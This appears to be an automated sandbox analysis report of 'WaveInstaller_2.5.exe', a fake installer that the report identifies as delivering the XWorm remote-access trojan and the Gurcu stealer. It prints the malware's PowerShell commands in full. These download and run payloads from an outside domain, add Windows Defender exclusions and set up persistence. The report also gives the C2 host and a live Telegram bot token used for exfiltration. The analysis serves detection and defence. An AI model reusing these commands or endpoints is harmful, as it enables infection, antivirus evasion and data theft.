gurcu | f06d703e9fef41979a899049dc50232b950543e6a9c0adee9b652277e9be64ce

Analysis

max time kernel
299s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2024 22:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WaveInstaller_2.5.exe
Size

35.9MB
MD5

ee462d9e9b760b6d5f84847046fc608a
SHA1

af4928d2d723ac17fcb7644e01e0c7a5be08bc49
SHA256

f06d703e9fef41979a899049dc50232b950543e6a9c0adee9b652277e9be64ce
SHA512

895efddeb85d6246d2cc6661baeb77ee66219ac0cecc5f826533e2c21b27b254d0ddf01d3e3895b89f83f87e91230cd777d6de159a290bdaef0acef22a85b28d
SSDEEP

393216:m1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfw:mMguj8Q4VfvlqFTrYV

Score

10^/10

gurcu xworm execution rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

roblox.airdns.org:62604

Mutex

G7obyOuwlcJIJWSW

Attributes

Install_directory
%AppData%
install_file
Runtime Broker.exe
telegram
https://api.telegram.org/bot6871887156:AAH4uOJPQoZzoRxR8zOxOqMIkNDYQQvogdM

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot6871887156:AAH4uOJPQoZzoRxR8zOxOqMIkNDYQQvogdM/sendMessage?chat_id=-4513157803

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\wave.exe	family_xworm
behavioral2/memory/708-126-0x0000000000380000-0x0000000000390000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

10 3888 powershell.exe
30 4868 powershell.exe

flow	pid	process
10	3888	powershell.exe
30	4868	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3888	powershell.exe
1164	powershell.exe
4868	powershell.exe
1000	powershell.exe
3888	powershell.exe
4868	powershell.exe
4284	powershell.exe
4304	powershell.exe
1372	powershell.exe
3816	powershell.exe
3464	powershell.exe
3200	powershell.exe
4764	powershell.exe
3048	powershell.exe
1028	powershell.exe

Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wave.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wave.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	wave.exe

Drops startup file 2 IoCs

Processes:

wave.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk	wave.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk	wave.exe

Executes dropped EXE 1 IoCs

Processes:

wave.exe

pid process

708 wave.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
708	wave.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3712 timeout.exe
Modifies registry class 1 IoCs

Processes:

taskmgr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings taskmgr.exe

pid	process
3712	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewave.exe

pid	process
3888	powershell.exe
3888	powershell.exe
1164	powershell.exe
1164	powershell.exe
1028	powershell.exe
1028	powershell.exe
3816	powershell.exe
3816	powershell.exe
3464	powershell.exe
3464	powershell.exe
3200	powershell.exe
3200	powershell.exe
4764	powershell.exe
4764	powershell.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4776	taskmgr.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
3048	powershell.exe
3048	powershell.exe
3048	powershell.exe
4284	powershell.exe
4284	powershell.exe
4284	powershell.exe
4776	taskmgr.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
4776	taskmgr.exe
4776	taskmgr.exe
708	wave.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4776 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exewave.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4776	taskmgr.exe
Token: SeSystemProfilePrivilege	4776	taskmgr.exe
Token: SeCreateGlobalPrivilege	4776	taskmgr.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeDebugPrivilege	708	wave.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	708	wave.exe
Token: SeBackupPrivilege	4060	svchost.exe
Token: SeRestorePrivilege	4060	svchost.exe
Token: SeSecurityPrivilege	4060	svchost.exe
Token: SeTakeOwnershipPrivilege	4060	svchost.exe
Token: 35	4060	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe
4776	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wave.exe

pid process

708 wave.exe

pid	process
708	wave.exe

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

WaveInstaller_2.5.execmd.exepowershell.execmd.exepowershell.exewave.exe

description	pid	process	target process
PID 2032 wrote to memory of 4172	2032	WaveInstaller_2.5.exe	cmd.exe
PID 2032 wrote to memory of 4172	2032	WaveInstaller_2.5.exe	cmd.exe
PID 4172 wrote to memory of 3804	4172	cmd.exe	chcp.com
PID 4172 wrote to memory of 3804	4172	cmd.exe	chcp.com
PID 4172 wrote to memory of 1188	4172	cmd.exe	find.exe
PID 4172 wrote to memory of 1188	4172	cmd.exe	find.exe
PID 4172 wrote to memory of 1436	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 1436	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 3196	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 3196	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 3388	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 3388	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 4200	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 4200	4172	cmd.exe	findstr.exe
PID 4172 wrote to memory of 4300	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 4300	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 2244	4172	cmd.exe	find.exe
PID 4172 wrote to memory of 2244	4172	cmd.exe	find.exe
PID 4172 wrote to memory of 2704	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 2704	4172	cmd.exe	cmd.exe
PID 4172 wrote to memory of 3888	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 3888	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 1164	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 1164	4172	cmd.exe	powershell.exe
PID 1164 wrote to memory of 1784	1164	powershell.exe	cmd.exe
PID 1164 wrote to memory of 1784	1164	powershell.exe	cmd.exe
PID 4172 wrote to memory of 3712	4172	cmd.exe	timeout.exe
PID 4172 wrote to memory of 3712	4172	cmd.exe	timeout.exe
PID 1784 wrote to memory of 1028	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1028	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3816	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3816	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3464	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3464	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3200	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 3200	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 4764	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 4764	1784	cmd.exe	powershell.exe
PID 4172 wrote to memory of 4868	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 4868	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 1000	4172	cmd.exe	powershell.exe
PID 4172 wrote to memory of 1000	4172	cmd.exe	powershell.exe
PID 1000 wrote to memory of 708	1000	powershell.exe	wave.exe
PID 1000 wrote to memory of 708	1000	powershell.exe	wave.exe
PID 708 wrote to memory of 3048	708	wave.exe	powershell.exe
PID 708 wrote to memory of 3048	708	wave.exe	powershell.exe
PID 708 wrote to memory of 4284	708	wave.exe	powershell.exe
PID 708 wrote to memory of 4284	708	wave.exe	powershell.exe
PID 708 wrote to memory of 4304	708	wave.exe	powershell.exe
PID 708 wrote to memory of 4304	708	wave.exe	powershell.exe
PID 708 wrote to memory of 1372	708	wave.exe	powershell.exe
PID 708 wrote to memory of 1372	708	wave.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\WaveInstaller_2.5.exe
"C:\Users\Admin\AppData\Local\Temp\WaveInstaller_2.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\system32\cmd.exe
  cmd.exe /d,/c,call,C:\Users\Admin\AppData\Local\Temp\4hae7d.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4172
- - C:\Windows\system32\chcp.com
    chcp.com 437
    3⤵
    PID:3804
- - C:\Windows\system32\find.exe
    find
    3⤵
    PID:1188
- - C:\Windows\system32\findstr.exe
    findstr /L /I set C:\Users\Admin\AppData\Local\Temp\4hae7d.bat
    3⤵
    PID:1436
- - C:\Windows\system32\findstr.exe
    findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\4hae7d.bat
    3⤵
    PID:3196
- - C:\Windows\system32\findstr.exe
    findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\4hae7d.bat
    3⤵
    PID:3388
- - C:\Windows\system32\findstr.exe
    findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\4hae7d.bat
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:4300
- - C:\Windows\system32\find.exe
    find
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:2704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://virtualishot.xyz/exclu.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\exclu.bat'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\exclu.bat' -Verb RunAs -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\exclu.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { exit 1 }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Users' } catch { }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Program Files' } catch { }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' } catch { }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Windows' } catch { }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://virtualishot.xyz/wave.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\wave.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\wave.exe' -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\wave.exe
      "C:\Users\Admin\AppData\Local\Temp\wave.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wave.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wave.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Runtime Broker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
23124dd32a0dcf539211e8c92ce27c52

SHA1
596813519df88d65e8b4bf3dcd0475c1879bc2fb

SHA256
3576a6901a6a87637661865adc3d7e2b4ad994f1fbee2cf1eba22a005ab2ae80

SHA512
55694f5692537865557fadb39f43a2304a01553980bbb373894443c39ed3d988e1318a6542fd34b2f804a8b76645a006658abdfcbce25feb4f14305c0c18ce4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
47605a4dda32c9dff09a9ca441417339

SHA1
4f68c895c35b0dc36257fc8251e70b968c560b62

SHA256
e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

SHA512
b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
70b91f47c8bd3052c4d39cbd45880816

SHA1
257c901314468208fa423208e2fa4f5745d907ee

SHA256
1bf09ec34561388d44d538c3683ad87a678dca276916e5a9cbce54f7f5ccb658

SHA512
962cc623daf87e5765d7ebb3426b5c530ef72fb105dc8cacf08a8ac43add288ffa30684855c890969d55a120ef2207b0c9a4abcf9e2b93006a2e944eaadf372d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8857491a4a65a9a1d560c4705786a312

SHA1
4f3caf2ad5d66a2410c9cca0381d26a46e832cb4

SHA256
b6e1a16a11075cb4e0bae0cebdb6ac15f5d66e0005f557703708a04cd11bd360

SHA512
d9497c47898cdc4c4fc62158830dc931990e08bb4a28a5d19d4187a87a2afab8a4bd58ca346563210b476c9adb9a714bfe1057e0ebce85d1fd94731be6d02660

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hae7d.bat

Filesize
19KB

MD5
b6f9f32c55b4c4ed3f73b6aa8d69a229

SHA1
0a35e82212f5e149e99fc0c6759aa2aeb1dfa434

SHA256
3078a0e18ece3ea41411c14fca897ae28fafb0a1746bd559778594447471fc17

SHA512
e94a782069ba8f234790de9fc04b43f25614f9100a22d73fd1df65b1e7c8503027824529f70e5f0413cea09a108407a38a084e53c94e6f11f00520e62ae9b17c

Download Submit
